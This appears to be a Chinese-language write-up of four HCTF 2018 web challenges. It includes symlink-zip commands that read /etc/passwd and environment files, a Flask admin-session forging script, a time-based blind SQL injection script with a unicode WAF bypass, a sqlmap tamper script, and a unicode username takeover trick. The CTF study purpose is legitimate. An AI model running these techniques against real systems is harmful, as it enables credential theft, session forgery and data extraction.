hctf2018wp復現

1、bottle

登陸網站后存在提交url的地方

 

測試發生存在如下paload,知識點：1、crlf 2、寫一個網站開發的端口小於80，瀏覽器就不會跳轉能執行js(payload只能在火狐瀏覽器執行):

 驗證碼部分可以生成1-10000的Md5值 ，構造如下payload:

下面這個圖就是打到自己的cookie。如果將這個payload提交到url那里，也就是xss bot存在的地方 就能打到管理員的cookie:

 2、hide and seek

軟鏈漏洞：

ln -s /etc/passwd 1.txt
zip -y 1.zip 1.txt
就能得到/etc/passwd源碼

ln -s /proc/self/environ 1.txt
zip -y 1.zip 1.txt
得到配置

ln -s /app/hard_t0_guess_n9f5a95b5ku9fg/hard_t0_guess_also_df45v48ytj9_main.py 1.txt
zip -y 1.zip 1.txt
把1.zip上傳就能拿到源碼

當已知flask的secret_key已知時就能偽造管理員的session

random.seed(uuid.getnode()) app = Flask(__name__) app.config['SECRET_KEY'] = str(random.random()*100)
得到secret_key=11.935137566861131

偽造admin session的腳本：

import hmac
from hashlib import sha1
from itsdangerous import *

def session_serializer(secret_key):
    signer_kwargs = dict(
        key_derivation='hmac',
        digest_method=sha1
    )
    Serializer = URLSafeTimedSerializer(secret_key, salt='cookie-session',
                                  signer_kwargs=signer_kwargs)
    data = {'username': 'admin'}
    return Serializer.dumps(data)

if __name__ == '__main__':
    secret_key = '11.935137566861131'
    print session_serializer(secret_key)

該cookie通過.分割,分成了三部分:內容序列化+時間+防篡改值https://www.aliyun.com/jiaocheng/491548.html

3、kzone學到的知識點

json_decode可以解析\u0020這樣的unicode編碼從而繞過waf

 

注入的時候如果存在大小寫敏感可以用binary區分

腳本：

#!/usr/bin/python
#!coding:utf-8#
# xishir
import requests
import time
import datetime

#hctf{4526a8cbd741b3f790f95ad32c2514b9}

ss = "{}_0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ-+"
r = requests.session()
url = "http://kzone.2018.hctf.io/admin/"
#url="http://127.0.0.1/hctf/www/admin/"

union = '\u00'+str(hex(ord('u')))[2:]+'nion'
sleep = '\u00'+str(hex(ord('s')))[2:]+'leep'
ascii = '\u00'+str(hex(ord('a')))[2:]+'scii'
ok = '\u00'+str(hex(ord('=')))[2:]
substr = '\u00'+str(hex(ord('s')))[2:]+'ubstr'
over = '\u00'+str(hex(ord('#')))[2:]
blank = "/**/"
orr = '\u00'+str(hex(ord('o')))[2:]+'r'

flag=""
for i in range(1,50):
    print i
    for j in ss:
        payload = "admin' and (substr((select binary F1a9 from F1444g limit 1),"+str(i)+",1)='"+str(j)+"') and sleep(4) and 1='1"

        payload = payload.replace('sleep',sleep)
        payload = payload.replace('union',union)
        payload = payload.replace('=',ok)
        payload = payload.replace('#',over)
        payload = payload.replace(' ',blank)
        payload = payload.replace('ascii',ascii)
        payload = payload.replace('substr',substr)
        payload = payload.replace('or',orr)

        jsons = '{"admin_user":"'+payload+'","admin_pass":"3b30a11aaba222edd6e704e9959b94643ed4ffd9"}'

        cookie={"PHPSESSID":"t0k91etf5fecbi4t25d7hprtm3",
        "islogin":"1",
        "login_data":jsons}

        t1=time.time()
        r1 = r.get("http://kzone.2018.hctf.io",cookies=cookie)
        t2=time.time()
        #print t2
        if (t2-t1)>4:
            #print "aaaaaaaa"
            flag+=str(j)
            print i,flag
            break

通過sqlmap注入看flagpig的文章：https://xz.aliyun.com/t/3245#toc-4

a.txt的數據包：注入的位置用*號代替

POST /admin/list.php HTTP/1.1
Host: kzone.2018.hctf.io
Content-Length: 33
Cache-Control: max-age=0
Origin: http://kzone.2018.hctf.io
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://kzone.2018.hctf.io/admin/login.php
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: _ga=GA1.2.741104145.1542009847; _gid=GA1.2.1399152972.1542009847; PHPSESSID=07hcqdlsdk80c1o2bgjp5r32e3;; islogin=1; login_data=*
Connection: close

user=11111&pass=11111&login=Login

hctf.py腳本放到tamper目錄下

#!/usr/bin/env python
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.LOW

def dependencies():
    pass

def tamper(payload, **kwargs):
    data = '''{"admin_user":"admin%s","admin_pass":65};'''
    payload = payload.lower()
    payload = payload.replace('u', '\u0075')
    payload = payload.replace('o', '\u006f')
    payload = payload.replace('i', '\u0069')
    payload = payload.replace('\'','\u0027')
    payload = payload.replace('"', '\u0022')
    payload = payload.replace(' ', '\u0020')
    payload = payload.replace('s', '\u0073')
    payload = payload.replace('#', '\u0023')
    payload = payload.replace('>', '\u003e')
    payload = payload.replace('<', '\u003c')
    payload = payload.replace('-', '\u002d')
    payload = payload.replace('=', '\u003d')
    payload = payload.replace('f1', 'F1')
    return data % payload

sqlmap -r a.txt --tamper=hctf --dbms=mysql --thread=10 --technique=B --not-string="window.location" -v3 -D hctf_kouzone -T F1444g -C F1a9 --dump

出數據

 

https://www.anquanke.com/post/id/163958

 4、admin

存在flask偽造admin的解法。https://www.anquanke.com/post/id/164086

def strlower(username):
    username = nodeprep.prepare(username)
    return username

unicode安全問題

 http://blog.lnyas.xyz/?p=1411

注冊一個ᴬdmin賬號
登陸ᴬdmin，發現頁面顯示Admin
修改密碼，退出登錄

參考鏈接：

https://www.jianshu.com/p/8f5ba751aa0f

https://xz.aliyun.com/t/3255#toc-7

http://wiki.ioin.in/post/group/18NJ